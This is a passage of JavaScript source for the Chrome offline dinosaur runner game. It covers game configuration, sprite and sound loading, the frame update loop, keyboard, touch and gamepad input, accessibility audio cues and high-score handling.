this.setupDisabledRunner();
} else {
if (Runner.isAltGameModeEnabled()) {
this.initAltGameType();
Runner.gameType = this.gameType;
}
this.loadImages();
window['initializeEasterEggHighScore'] =
this.initializeHighScore.bind(this);
}
}
/**
* Default game width.
* @const
*/
const DEFAULT_WIDTH = 600;
/**
* Frames per second.
* @const
*/
const FPS = 60;
/** @const */
const IS_HIDPI = window.devicePixelRatio > 1;
/** @const */
const IS_IOS = /CriOS/.test(window.navigator.userAgent);
/** @const */
const IS_MOBILE = /Android/.test(window.navigator.userAgent) || IS_IOS;
/** @const */
const IS_RTL = document.querySelector('html').dir == 'rtl';
/** @const */
const ARCADE_MODE_URL = 'chrome://dino/';
/** @const */
const RESOURCE_POSTFIX = 'offline-resources-';
/** @const */
const A11Y_STRINGS = {
ariaLabel: 'dinoGameA11yAriaLabel',
description: 'dinoGameA11yDescription',
gameOver: 'dinoGameA11yGameOver',
highScore: 'dinoGameA11yHighScore',
jump: 'dinoGameA11yJump',
started: 'dinoGameA11yStartGame',
speedLabel: 'dinoGameA11ySpeedToggle',
};
/**
* Default game configuration.
* Shared config for all versions of the game. Additional parameters are
* defined in Runner.normalConfig and Runner.slowConfig.
*/
Runner.config = {
AUDIOCUE_PROXIMITY_THRESHOLD: 190,
AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
BG_CLOUD_SPEED: 0.2,
BOTTOM_PAD: 10,
// Scroll Y threshold at which the game can be activated.
CANVAS_IN_VIEW_OFFSET: -10,
CLEAR_TIME: 3000,
CLOUD_FREQUENCY: 0.5,
FADE_DURATION: 1,
FLASH_DURATION: 1000,
GAMEOVER_CLEAR_TIME: 1200,
INITIAL_JUMP_VELOCITY: 12,
INVERT_FADE_DURATION: 12000,
MAX_BLINK_COUNT: 3,
MAX_CLOUDS: 6,
MAX_OBSTACLE_LENGTH: 3,
MAX_OBSTACLE_DUPLICATION: 2,
RESOURCE_TEMPLATE_ID: 'audio-resources',
SPEED: 6,
SPEED_DROP_COEFFICIENT: 3,
ARCADE_MODE_INITIAL_TOP_POSITION: 35,
ARCADE_MODE_TOP_POSITION_PERCENT: 0.1,
};
Runner.normalConfig = {
ACCELERATION: 0.001,
AUDIOCUE_PROXIMITY_THRESHOLD: 190,
AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
GAP_COEFFICIENT: 0.6,
INVERT_DISTANCE: 700,
MAX_SPEED: 13,
MOBILE_SPEED_COEFFICIENT: 1.2,
SPEED: 6,
};
Runner.slowConfig = {
ACCELERATION: 0.0005,
AUDIOCUE_PROXIMITY_THRESHOLD: 170,
AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 220,
GAP_COEFFICIENT: 0.3,
INVERT_DISTANCE: 350,
MAX_SPEED: 9,
MOBILE_SPEED_COEFFICIENT: 1.5,
SPEED: 4.2,
};
/**
* Default dimensions.
*/
Runner.defaultDimensions = {
WIDTH: DEFAULT_WIDTH,
HEIGHT: 150,
};
/**
* CSS class names.
* @enum {string}
*/
Runner.classes = {
ARCADE_MODE: 'arcade-mode',
CANVAS: 'runner-canvas',
CONTAINER: 'runner-container',
CRASHED: 'crashed',
ICON: 'icon-offline',
INVERTED: 'inverted',
SNACKBAR: 'snackbar',
SNACKBAR_SHOW: 'snackbar-show',
TOUCH_CONTROLLER: 'controller',
};
/**
* Sound FX. Reference to the ID of the audio tag on interstitial page.
* @enum {string}
*/
Runner.sounds = {
BUTTON_PRESS: 'offline-sound-press',
HIT: 'offline-sound-hit',
SCORE: 'offline-sound-reached',
};
/**
* Key code mapping.
* @enum {Object}
*/
Runner.keycodes = {
JUMP: {'38': 1, '32': 1}, // Up, spacebar
DUCK: {'40': 1}, // Down
RESTART: {'13': 1}, // Enter
};
/**
* Runner event names.
* @enum {string}
*/
Runner.events = {
ANIM_END: 'webkitAnimationEnd',
CLICK: 'click',
KEYDOWN: 'keydown',
KEYUP: 'keyup',
POINTERDOWN: 'pointerdown',
POINTERUP: 'pointerup',
RESIZE: 'resize',
TOUCHEND: 'touchend',
TOUCHSTART: 'touchstart',
VISIBILITY: 'visibilitychange',
BLUR: 'blur',
FOCUS: 'focus',
LOAD: 'load',
GAMEPADCONNECTED: 'gamepadconnected',
};
Runner.prototype = {
/**
* Initialize alternative game type.
*/
initAltGameType() {
if (GAME_TYPE.length > 0) {
this.gameType = loadTimeData && loadTimeData.valueExists('altGameType') ?
GAME_TYPE[parseInt(loadTimeData.getValue('altGameType'), 10) - 1] :
'';
}
},
/**
* Whether the easter egg has been disabled. CrOS enterprise enrolled devices.
* @return {boolean}
*/
isDisabled() {
return loadTimeData && loadTimeData.valueExists('disabledEasterEgg');
},
/**
* For disabled instances, set up a snackbar with the disabled message.
*/
setupDisabledRunner() {
this.containerEl = document.createElement('div');
this.containerEl.className = Runner.classes.SNACKBAR;
this.containerEl.textContent = loadTimeData.getValue('disabledEasterEgg');
this.outerContainerEl.appendChild(this.containerEl);
// Show notification when the activation key is pressed.
document.addEventListener(Runner.events.KEYDOWN, function(e) {
if (Runner.keycodes.JUMP[e.keyCode]) {
this.containerEl.classList.add(Runner.classes.SNACKBAR_SHOW);
document.querySelector('.icon').classList.add('icon-disabled');
}
}.bind(this));
},
/**
* Setting individual settings for debugging.
* @param {string} setting
* @param {number|string} value
*/
updateConfigSetting(setting, value) {
if (setting in this.config && value !== undefined) {
this.config[setting] = value;
switch (setting) {
case 'GRAVITY':
case 'MIN_JUMP_HEIGHT':
case 'SPEED_DROP_COEFFICIENT':
this.tRex.config[setting] = value;
break;
case 'INITIAL_JUMP_VELOCITY':
this.tRex.setJumpVelocity(value);
break;
case 'SPEED':
this.setSpeed(/** @type {number} */ (value));
break;
}
}
},
/**
* Creates an on page image element from the base 64 encoded string source.
* @param {string} resourceName Name in data object,
* @return {HTMLImageElement} The created element.
*/
createImageElement(resourceName) {
const imgSrc = loadTimeData && loadTimeData.valueExists(resourceName) ?
loadTimeData.getString(resourceName) :
null;
if (imgSrc) {
const el =
/** @type {HTMLImageElement} */ (document.createElement('img'));
el.id = resourceName;
el.src = imgSrc;
document.getElementById('offline-resources').appendChild(el);
return el;
}
return null;
},
/**
* Cache the appropriate image sprite from the page and get the sprite sheet
* definition.
*/
loadImages() {
let scale = '1x';
this.spriteDef = Runner.spriteDefinition.LDPI;
if (IS_HIDPI) {
scale = '2x';
this.spriteDef = Runner.spriteDefinition.HDPI;
}
Runner.imageSprite = /** @type {HTMLImageElement} */
(document.getElementById(RESOURCE_POSTFIX + scale));
if (this.gameType) {
Runner.altGameImageSprite = /** @type {HTMLImageElement} */
(this.createImageElement('altGameSpecificImage' + scale));
Runner.altCommonImageSprite = /** @type {HTMLImageElement} */
(this.createImageElement('altGameCommonImage' + scale));
}
Runner.origImageSprite = Runner.imageSprite;
// Disable the alt game mode if the sprites can't be loaded.
if (!Runner.altGameImageSprite || !Runner.altCommonImageSprite) {
Runner.isAltGameModeEnabled = () => false;
this.altGameModeActive = false;
}
if (Runner.imageSprite.complete) {
this.init();
} else {
// If the images are not yet loaded, add a listener.
Runner.imageSprite.addEventListener(Runner.events.LOAD,
this.init.bind(this));
}
},
/**
* Load and decode base 64 encoded sounds.
*/
loadSounds() {
if (!IS_IOS) {
this.audioContext = new AudioContext();
const resourceTemplate =
document.getElementById(this.config.RESOURCE_TEMPLATE_ID).content;
for (const sound in Runner.sounds) {
let soundSrc =
resourceTemplate.getElementById(Runner.sounds[sound]).src;
soundSrc = soundSrc.substr(soundSrc.indexOf(',') + 1);
const buffer = decodeBase64ToArrayBuffer(soundSrc);
// Async, so no guarantee of order in array.
this.audioContext.decodeAudioData(buffer, function(index, audioData) {
this.soundFx[index] = audioData;
}.bind(this, sound));
}
}
},
/**
* Sets the game speed. Adjust the speed accordingly if on a smaller screen.
* @param {number=} opt_speed
*/
setSpeed(opt_speed) {
const speed = opt_speed || this.currentSpeed;
// Reduce the speed on smaller mobile screens.
if (this.dimensions.WIDTH < DEFAULT_WIDTH) {
const mobileSpeed = Runner.slowDown ? speed :
speed * this.dimensions.WIDTH /
DEFAULT_WIDTH * this.config.MOBILE_SPEED_COEFFICIENT;
this.currentSpeed = mobileSpeed > speed ? speed : mobileSpeed;
} else if (opt_speed) {
this.currentSpeed = opt_speed;
}
},
/**
* Game initialiser.
*/
init() {
// Hide the static icon.
document.querySelector('.' + Runner.classes.ICON).style.visibility =
'hidden';
this.adjustDimensions();
this.setSpeed();
const ariaLabel = getA11yString(A11Y_STRINGS.ariaLabel);
this.containerEl = document.createElement('div');
this.containerEl.setAttribute('role', IS_MOBILE ? 'button' : 'application');
this.containerEl.setAttribute('tabindex', '0');
this.containerEl.setAttribute('title', ariaLabel);
this.containerEl.className = Runner.classes.CONTAINER;
// Player canvas container.
this.canvas = createCanvas(this.containerEl, this.dimensions.WIDTH,
this.dimensions.HEIGHT);
// Live region for game status updates.
this.a11yStatusEl = document.createElement('span');
this.a11yStatusEl.className = 'offline-runner-live-region';
this.a11yStatusEl.setAttribute('aria-live', 'assertive');
this.a11yStatusEl.textContent = '';
Runner.a11yStatusEl = this.a11yStatusEl;
// Add checkbox to slow down the game.
this.slowSpeedCheckboxLabel = document.createElement('label');
this.slowSpeedCheckboxLabel.className = 'slow-speed-option hidden';
this.slowSpeedCheckboxLabel.textContent =
getA11yString(A11Y_STRINGS.speedLabel);
this.slowSpeedCheckbox = document.createElement('input');
this.slowSpeedCheckbox.setAttribute('type', 'checkbox');
this.slowSpeedCheckbox.setAttribute(
'title', getA11yString(A11Y_STRINGS.speedLabel));
this.slowSpeedCheckbox.setAttribute('tabindex', '0');
this.slowSpeedCheckbox.setAttribute('checked', 'checked');
this.slowSpeedToggleEl = document.createElement('span');
this.slowSpeedToggleEl.className = 'slow-speed-toggle';
this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedCheckbox);
this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedToggleEl);
if (IS_IOS) {
this.outerContainerEl.appendChild(this.a11yStatusEl);
} else {
this.containerEl.appendChild(this.a11yStatusEl);
}
announcePhrase(getA11yString(A11Y_STRINGS.description));
this.generatedSoundFx = new GeneratedSoundFx();
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
this.canvasCtx.fillStyle = '#f7f7f7';
this.canvasCtx.fill();
Runner.updateCanvasScaling(this.canvas);
// Horizon contains clouds, obstacles and the ground.
this.horizon = new Horizon(this.canvas, this.spriteDef, this.dimensions,
this.config.GAP_COEFFICIENT);
// Distance meter
this.distanceMeter = new DistanceMeter(this.canvas,
this.spriteDef.TEXT_SPRITE, this.dimensions.WIDTH);
// Draw t-rex
this.tRex = new Trex(this.canvas, this.spriteDef.TREX);
this.outerContainerEl.appendChild(this.containerEl);
this.outerContainerEl.appendChild(this.slowSpeedCheckboxLabel);
this.startListening();
this.update();
window.addEventListener(Runner.events.RESIZE,
this.debounceResize.bind(this));
// Handle dark mode
const darkModeMediaQuery =
window.matchMedia('(prefers-color-scheme: dark)');
this.isDarkMode = darkModeMediaQuery && darkModeMediaQuery.matches;
darkModeMediaQuery.addListener((e) => {
this.isDarkMode = e.matches;
});
},
/**
* Create the touch controller. A div that covers whole screen.
*/
createTouchController() {
this.touchController = document.createElement('div');
this.touchController.className = Runner.classes.TOUCH_CONTROLLER;
this.touchController.addEventListener(Runner.events.TOUCHSTART, this);
this.touchController.addEventListener(Runner.events.TOUCHEND, this);
this.outerContainerEl.appendChild(this.touchController);
},
/**
* Debounce the resize event.
*/
debounceResize() {
if (!this.resizeTimerId_) {
this.resizeTimerId_ =
setInterval(this.adjustDimensions.bind(this), 250);
}
},
/**
* Adjust game space dimensions on resize.
*/
adjustDimensions() {
clearInterval(this.resizeTimerId_);
this.resizeTimerId_ = null;
const boxStyles = window.getComputedStyle(this.outerContainerEl);
const padding = Number(boxStyles.paddingLeft.substr(0,
boxStyles.paddingLeft.length - 2));
this.dimensions.WIDTH = this.outerContainerEl.offsetWidth - padding * 2;
if (this.isArcadeMode()) {
this.dimensions.WIDTH = Math.min(DEFAULT_WIDTH, this.dimensions.WIDTH);
if (this.activated) {
this.setArcadeModeContainerScale();
}
}
// Redraw the elements back onto the canvas.
if (this.canvas) {
this.canvas.width = this.dimensions.WIDTH;
this.canvas.height = this.dimensions.HEIGHT;
Runner.updateCanvasScaling(this.canvas);
this.distanceMeter.calcXPos(this.dimensions.WIDTH);
this.clearCanvas();
this.horizon.update(0, 0, true);
this.tRex.update(0);
// Outer container and distance meter.
if (this.playing || this.crashed || this.paused) {
this.containerEl.style.width = this.dimensions.WIDTH + 'px';
this.containerEl.style.height = this.dimensions.HEIGHT + 'px';
this.distanceMeter.update(0, Math.ceil(this.distanceRan));
this.stop();
} else {
this.tRex.draw(0, 0);
}
// Game over panel.
if (this.crashed && this.gameOverPanel) {
this.gameOverPanel.updateDimensions(this.dimensions.WIDTH);
this.gameOverPanel.draw(this.altGameModeActive, this.tRex);
}
}
},
/**
* Play the game intro.
* Canvas container width expands out to the full width.
*/
playIntro() {
if (!this.activated && !this.crashed) {
this.playingIntro = true;
this.tRex.playingIntro = true;
// CSS animation definition.
const keyframes = '@-webkit-keyframes intro { ' +
'from { width:' + Trex.config.WIDTH + 'px }' +
'to { width: ' + this.dimensions.WIDTH + 'px }' +
'}';
document.styleSheets[0].insertRule(keyframes, 0);
this.containerEl.addEventListener(Runner.events.ANIM_END,
this.startGame.bind(this));
this.containerEl.style.webkitAnimation = 'intro .4s ease-out 1 both';
this.containerEl.style.width = this.dimensions.WIDTH + 'px';
this.setPlayStatus(true);
this.activated = true;
} else if (this.crashed) {
this.restart();
}
},
/**
* Update the game status to started.
*/
startGame() {
if (this.isArcadeMode()) {
this.setArcadeMode();
}
this.toggleSpeed();
this.runningTime = 0;
this.playingIntro = false;
this.tRex.playingIntro = false;
this.containerEl.style.webkitAnimation = '';
this.playCount++;
this.generatedSoundFx.background();
announcePhrase(getA11yString(A11Y_STRINGS.started));
if (Runner.audioCues) {
this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
}
// Handle tabbing off the page. Pause the current game.
document.addEventListener(Runner.events.VISIBILITY,
this.onVisibilityChange.bind(this));
window.addEventListener(Runner.events.BLUR,
this.onVisibilityChange.bind(this));
window.addEventListener(Runner.events.FOCUS,
this.onVisibilityChange.bind(this));
},
clearCanvas() {
this.canvasCtx.clearRect(0, 0, this.dimensions.WIDTH,
this.dimensions.HEIGHT);
},
/**
* Checks whether the canvas area is in the viewport of the browser
* through the current scroll position.
* @return boolean.
*/
isCanvasInView() {
return this.containerEl.getBoundingClientRect().top >
Runner.config.CANVAS_IN_VIEW_OFFSET;
},
/**
* Enable the alt game mode. Switching out the sprites.
*/
enableAltGameMode() {
Runner.imageSprite = Runner.altGameImageSprite;
Runner.spriteDefinition = Runner.spriteDefinitionByType[Runner.gameType];
if (IS_HIDPI) {
this.spriteDef = Runner.spriteDefinition.HDPI;
} else {
this.spriteDef = Runner.spriteDefinition.LDPI;
}
this.altGameModeActive = true;
this.tRex.enableAltGameMode(this.spriteDef.TREX);
this.horizon.enableAltGameMode(this.spriteDef);
this.generatedSoundFx.background();
},
/**
* Update the game frame and schedules the next one.
*/
update() {
this.updatePending = false;
const now = getTimeStamp();
let deltaTime = now - (this.time || now);
// Flashing when switching game modes.
if (this.altGameModeFlashTimer < 0 || this.altGameModeFlashTimer === 0) {
this.altGameModeFlashTimer = null;
this.tRex.setFlashing(false);
this.enableAltGameMode();
} else if (this.altGameModeFlashTimer > 0) {
this.altGameModeFlashTimer -= deltaTime;
this.tRex.update(deltaTime);
deltaTime = 0;
}
this.time = now;
if (this.playing) {
this.clearCanvas();
// Additional fade in - Prevents jump when switching sprites
if (this.altGameModeActive &&
this.fadeInTimer <= this.config.FADE_DURATION) {
this.fadeInTimer += deltaTime / 1000;
this.canvasCtx.globalAlpha = this.fadeInTimer;
} else {
this.canvasCtx.globalAlpha = 1;
}
if (this.tRex.jumping) {
this.tRex.updateJump(deltaTime);
}
this.runningTime += deltaTime;
const hasObstacles = this.runningTime > this.config.CLEAR_TIME;
// First jump triggers the intro.
if (this.tRex.jumpCount === 1 && !this.playingIntro) {
this.playIntro();
}
// The horizon doesn't move until the intro is over.
if (this.playingIntro) {
this.horizon.update(0, this.currentSpeed, hasObstacles);
} else if (!this.crashed) {
const showNightMode = this.isDarkMode ^ this.inverted;
deltaTime = !this.activated ? 0 : deltaTime;
this.horizon.update(
deltaTime, this.currentSpeed, hasObstacles, showNightMode);
}
// Check for collisions.
let collision = hasObstacles &&
checkForCollision(this.horizon.obstacles[0], this.tRex);
// For a11y, audio cues.
if (Runner.audioCues && hasObstacles) {
const jumpObstacle =
this.horizon.obstacles[0].typeConfig.type != 'COLLECTABLE';
if (!this.horizon.obstacles[0].jumpAlerted) {
const threshold = Runner.isMobileMouseInput ?
Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y :
Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD;
const adjProximityThreshold = threshold +
(threshold * Math.log10(this.currentSpeed / Runner.config.SPEED));
if (this.horizon.obstacles[0].xPos < adjProximityThreshold) {
if (jumpObstacle) {
this.generatedSoundFx.jump();
}
this.horizon.obstacles[0].jumpAlerted = true;
}
}
}
// Activated alt game mode.
if (Runner.isAltGameModeEnabled() && collision &&
this.horizon.obstacles[0].typeConfig.type == 'COLLECTABLE') {
this.horizon.removeFirstObstacle();
this.tRex.setFlashing(true);
collision = false;
this.altGameModeFlashTimer = this.config.FLASH_DURATION;
this.runningTime = 0;
this.generatedSoundFx.collect();
}
if (!collision) {
this.distanceRan += this.currentSpeed * deltaTime / this.msPerFrame;
if (this.currentSpeed < this.config.MAX_SPEED) {
this.currentSpeed += this.config.ACCELERATION;
}
} else {
this.gameOver();
}
const playAchievementSound = this.distanceMeter.update(deltaTime,
Math.ceil(this.distanceRan));
if (!Runner.audioCues && playAchievementSound) {
this.playSound(this.soundFx.SCORE);
}
// Night mode.
if (!Runner.isAltGameModeEnabled()) {
if (this.invertTimer > this.config.INVERT_FADE_DURATION) {
this.invertTimer = 0;
this.invertTrigger = false;
this.invert(false);
} else if (this.invertTimer) {
this.invertTimer += deltaTime;
} else {
const actualDistance =
this.distanceMeter.getActualDistance(Math.ceil(this.distanceRan));
if (actualDistance > 0) {
this.invertTrigger =
!(actualDistance % this.config.INVERT_DISTANCE);
if (this.invertTrigger && this.invertTimer === 0) {
this.invertTimer += deltaTime;
this.invert(false);
}
}
}
}
}
if (this.playing || (!this.activated &&
this.tRex.blinkCount < Runner.config.MAX_BLINK_COUNT)) {
this.tRex.update(deltaTime);
this.scheduleNextUpdate();
}
},
/**
* Event handler.
* @param {Event} e
*/
handleEvent(e) {
return (function(evtType, events) {
switch (evtType) {
case events.KEYDOWN:
case events.TOUCHSTART:
case events.POINTERDOWN:
this.onKeyDown(e);
break;
case events.KEYUP:
case events.TOUCHEND:
case events.POINTERUP:
this.onKeyUp(e);
break;
case events.GAMEPADCONNECTED:
this.onGamepadConnected(e);
break;
}
}.bind(this))(e.type, Runner.events);
},
/**
* Initialize audio cues if activated by focus on the canvas element.
* @param {Event} e
*/
handleCanvasKeyPress(e) {
if (!this.activated && !Runner.audioCues) {
this.toggleSpeed();
Runner.audioCues = true;
this.generatedSoundFx.init();
Runner.generatedSoundFx = this.generatedSoundFx;
Runner.config.CLEAR_TIME *= 1.2;
} else if (e.keyCode && Runner.keycodes.JUMP[e.keyCode]) {
this.onKeyDown(e);
}
},
/**
* Prevent space key press from scrolling.
* @param {Event} e
*/
preventScrolling(e) {
if (e.keyCode === 32) {
e.preventDefault();
}
},
/**
* Toggle speed setting if toggle is shown.
*/
toggleSpeed() {
if (Runner.audioCues) {
const speedChange = Runner.slowDown != this.slowSpeedCheckbox.checked;
if (speedChange) {
Runner.slowDown = this.slowSpeedCheckbox.checked;
const updatedConfig =
Runner.slowDown ? Runner.slowConfig : Runner.normalConfig;
Runner.config = Object.assign(Runner.config, updatedConfig);
this.currentSpeed = updatedConfig.SPEED;
this.tRex.enableSlowConfig();
this.horizon.adjustObstacleSpeed();
}
if (this.playing) {
this.disableSpeedToggle(true);
}
}
},
/**
* Show the speed toggle.
* From focus event or when audio cues are activated.
* @param {Event=} e
*/
showSpeedToggle(e) {
const isFocusEvent = e && e.type == 'focus';
if (Runner.audioCues || isFocusEvent) {
this.slowSpeedCheckboxLabel.classList.toggle(
HIDDEN_CLASS, isFocusEvent ? false : !this.crashed);
}
},
/**
* Disable the speed toggle.
* @param {boolean} disable
*/
disableSpeedToggle(disable) {
if (disable) {
this.slowSpeedCheckbox.setAttribute('disabled', 'disabled');
} else {
this.slowSpeedCheckbox.removeAttribute('disabled');
}
},
/**
* Bind relevant key / mouse / touch listeners.
*/
startListening() {
// A11y keyboard / screen reader activation.
this.containerEl.addEventListener(
Runner.events.KEYDOWN, this.handleCanvasKeyPress.bind(this));
if (!IS_MOBILE) {
this.containerEl.addEventListener(
Runner.events.FOCUS, this.showSpeedToggle.bind(this));
}
this.canvas.addEventListener(
Runner.events.KEYDOWN, this.preventScrolling.bind(this));
this.canvas.addEventListener(
Runner.events.KEYUP, this.preventScrolling.bind(this));
// Keys.
document.addEventListener(Runner.events.KEYDOWN, this);
document.addEventListener(Runner.events.KEYUP, this);
// Touch / pointer.
this.containerEl.addEventListener(Runner.events.TOUCHSTART, this);
document.addEventListener(Runner.events.POINTERDOWN, this);
document.addEventListener(Runner.events.POINTERUP, this);
if (this.isArcadeMode()) {
// Gamepad
window.addEventListener(Runner.events.GAMEPADCONNECTED, this);
}
},
/**
* Remove all listeners.
*/
stopListening() {
document.removeEventListener(Runner.events.KEYDOWN, this);
document.removeEventListener(Runner.events.KEYUP, this);
if (this.touchController) {
this.touchController.removeEventListener(Runner.events.TOUCHSTART, this);
this.touchController.removeEventListener(Runner.events.TOUCHEND, this);
}
this.containerEl.removeEventListener(Runner.events.TOUCHSTART, this);
document.removeEventListener(Runner.events.POINTERDOWN, this);
document.removeEventListener(Runner.events.POINTERUP, this);
if (this.isArcadeMode()) {
window.removeEventListener(Runner.events.GAMEPADCONNECTED, this);
}
},
/**
* Process keydown.
* @param {Event} e
*/
onKeyDown(e) {
// Prevent native page scrolling whilst tapping on mobile.
if (IS_MOBILE && this.playing) {
e.preventDefault();
}
if (this.isCanvasInView()) {
// Allow toggling of speed toggle.
if (Runner.keycodes.JUMP[e.keyCode] &&
e.target == this.slowSpeedCheckbox) {
return;
}
if (!this.crashed && !this.paused) {
// For a11y, screen reader activation.
const isMobileMouseInput = IS_MOBILE &&
e.type === Runner.events.POINTERDOWN &&
e.pointerType == 'mouse' && e.target == this.containerEl ||
(IS_IOS && e.pointerType == 'touch' &&
document.activeElement == this.containerEl);
if (Runner.keycodes.JUMP[e.keyCode] ||
e.type === Runner.events.TOUCHSTART || isMobileMouseInput ||
(Runner.keycodes.DUCK[e.keyCode] && this.altGameModeActive)) {
e.preventDefault();
// Starting the game for the first time.
if (!this.playing) {
// Started by touch so create a touch controller.
if (!this.touchController && e.type === Runner.events.TOUCHSTART) {
this.createTouchController();
}
if (isMobileMouseInput) {
this.handleCanvasKeyPress(e);
}
this.loadSounds();
this.setPlayStatus(true);
this.update();
if (window.errorPageController) {
errorPageController.trackEasterEgg();
}
}
// Start jump.
if (!this.tRex.jumping && !this.tRex.ducking) {
if (Runner.audioCues) {
this.generatedSoundFx.cancelFootSteps();
} else {
this.playSound(this.soundFx.BUTTON_PRESS);
}
this.tRex.startJump(this.currentSpeed);
}
// Ducking is disabled on alt game modes.
} else if (
!this.altGameModeActive && this.playing &&
Runner.keycodes.DUCK[e.keyCode]) {
e.preventDefault();
if (this.tRex.jumping) {
// Speed drop, activated only when jump key is not pressed.
this.tRex.setSpeedDrop();
} else if (!this.tRex.jumping && !this.tRex.ducking) {
// Duck.
this.tRex.setDuck(true);
}
}
}
}
},
/**
* Process key up.
* @param {Event} e
*/
onKeyUp(e) {
const keyCode = String(e.keyCode);
const isjumpKey = Runner.keycodes.JUMP[keyCode] ||
e.type === Runner.events.TOUCHEND || e.type === Runner.events.POINTERUP;
if (this.isRunning() && isjumpKey) {
this.tRex.endJump();
} else if (Runner.keycodes.DUCK[keyCode]) {
this.tRex.speedDrop = false;
this.tRex.setDuck(false);
} else if (this.crashed) {
// Check that enough time has elapsed before allowing jump key to restart.
const deltaTime = getTimeStamp() - this.time;
if (this.isCanvasInView() &&
(Runner.keycodes.RESTART[keyCode] || this.isLeftClickOnCanvas(e) ||
(deltaTime >= this.config.GAMEOVER_CLEAR_TIME &&
Runner.keycodes.JUMP[keyCode]))) {
this.handleGameOverClicks(e);
}
} else if (this.paused && isjumpKey) {
// Reset the jump state
this.tRex.reset();
this.play();
}
},
/**
* Process gamepad connected event.
* @param {Event} e
*/
onGamepadConnected(e) {
if (!this.pollingGamepads) {
this.pollGamepadState();
}
},
/**
* rAF loop for gamepad polling.
*/
pollGamepadState() {
const gamepads = navigator.getGamepads();
this.pollActiveGamepad(gamepads);
this.pollingGamepads = true;
requestAnimationFrame(this.pollGamepadState.bind(this));
},
/**
* Polls for a gamepad with the jump button pressed. If one is found this
* becomes the "active" gamepad and all others are ignored.
* @param {!Array<Gamepad>} gamepads
*/
pollForActiveGamepad(gamepads) {
for (let i = 0; i < gamepads.length; ++i) {
if (gamepads[i] && gamepads[i].buttons.length > 0 &&
gamepads[i].buttons[0].pressed) {
this.gamepadIndex = i;
this.pollActiveGamepad(gamepads);
return;
}
}
},
/**
* Polls the chosen gamepad for button presses and generates KeyboardEvents
* to integrate with the rest of the game logic.
* @param {!Array<Gamepad>} gamepads
*/
pollActiveGamepad(gamepads) {
if (this.gamepadIndex === undefined) {
this.pollForActiveGamepad(gamepads);
return;
}
const gamepad = gamepads[this.gamepadIndex];
if (!gamepad) {
this.gamepadIndex = undefined;
this.pollForActiveGamepad(gamepads);
return;
}
// The gamepad specification defines the typical mapping of physical buttons
// to button indicies: https://w3c.github.io/gamepad/#remapping
this.pollGamepadButton(gamepad, 0, 38); // Jump
if (gamepad.buttons.length >= 2) {
this.pollGamepadButton(gamepad, 1, 40); // Duck
}
if (gamepad.buttons.length >= 10) {
this.pollGamepadButton(gamepad, 9, 13); // Restart
}
this.previousGamepad = gamepad;
},
/**
* Generates a key event based on a gamepad button.
* @param {!Gamepad} gamepad
* @param {number} buttonIndex
* @param {number} keyCode
*/
pollGamepadButton(gamepad, buttonIndex, keyCode) {
const state = gamepad.buttons[buttonIndex].pressed;
let previousState = false;
if (this.previousGamepad) {
previousState = this.previousGamepad.buttons[buttonIndex].pressed;
}
// Generate key events on the rising and falling edge of a button press.
if (state !== previousState) {
const e = new KeyboardEvent(state ? Runner.events.KEYDOWN
: Runner.events.KEYUP,
{ keyCode: keyCode });
document.dispatchEvent(e);
}
},
/**
* Handle interactions on the game over screen state.
* A user is able to tap the high score twice to reset it.
* @param {Event} e
*/
handleGameOverClicks(e) {
if (e.target != this.slowSpeedCheckbox) {
e.preventDefault();
if (this.distanceMeter.hasClickedOnHighScore(e) && this.highestScore) {
if (this.distanceMeter.isHighScoreFlashing()) {
// Subsequent click, reset the high score.
this.saveHighScore(0, true);
this.distanceMeter.resetHighScore();
} else {
// First click, flash the high score.
this.distanceMeter.startHighScoreFlashing();
}
} else {
this.distanceMeter.cancelHighScoreFlashing();
this.restart();
}
}
},
/**
* Returns whether the event was a left click on canvas.
* On Windows right click is registered as a click.
* @param {Event} e
* @return {boolean}
*/
isLeftClickOnCanvas(e) {
return e.button != null && e.button < 2 &&
e.type === Runner.events.POINTERUP &&
(e.target === this.canvas ||
(IS_MOBILE && Runner.audioCues && e.target === this.containerEl));
},
/**
* RequestAnimationFrame wrapper.
*/
scheduleNextUpdate() {
if (!this.updatePending) {
this.updatePending = true;
this.raqId = requestAnimationFrame(this.update.bind(this));
}
},
/**
* Whether the game is running.
* @return {boolean}
*/
isRunning() {
return !!this.raqId;
},
/**
* Set the initial high score as stored in the user's profile.
* @param {number} highScore
*/
initializeHighScore(highScore) {
this.syncHighestScore = true;
highScore = Math.ceil(highScore);
if (highScore < this.highestScore) {
if (window.errorPageController) {
errorPageController.updateEasterEggHighScore(this.highestScore);
}
return;
}
this.highestScore = highScore;
this.distanceMeter.setHighScore(this.highestScore);
},
/**
* Sets the current high score and saves to the profile if available.
* @param {number} distanceRan Total distance ran.
* @param {boolean=} opt_resetScore Whether to reset the score.
*/
saveHighScore(distanceRan, opt_resetScore) {
this.highestScore = Math.ceil(distanceRan);
this.distanceMeter.setHighScore(this.highestScore);
// Store the new high score in the profile.
if (this.syncHighestScore && window.errorPageController) {
if (opt_resetScore) {
errorPageController.resetEasterEggHighScore();
} else {
errorPageController.updateEasterEggHighScore(this.highestScore);
}
}
},
/**
* Game over state.
*/
gameOver() {
this.playSound(this.soundFx.HIT);
vibrate(200);
this.stop();
this.crashed = true;
this.distanceMeter.achievement = false;
this.tRex.update(100, Trex.status.CRASHED);
// Game over panel.
if (!this.gameOverPanel) {
const origSpriteDef = IS_HIDPI ?
Runner.spriteDefinitionByType.original.HDPI :
Runner.spriteDefinitionByType.original.LDPI;
if (this.canvas) {
if (Runner.isAltGameModeEnabled) {
this.gameOverPanel = new GameOverPanel(
this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
this.dimensions, origSpriteDef.ALT_GAME_END,
this.altGameModeActive);
} else {
this.gameOverPanel = new GameOverPanel(
this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
this.dimensions);
}
}
}
this.gameOverPanel.draw(this.altGameModeActive, this.tRex);
// Update the high score.
if (this.distanceRan > this.highestScore) {
this.saveHighScore(this.distanceRan);
}
// Reset the time clock.
this.time = getTimeStamp();
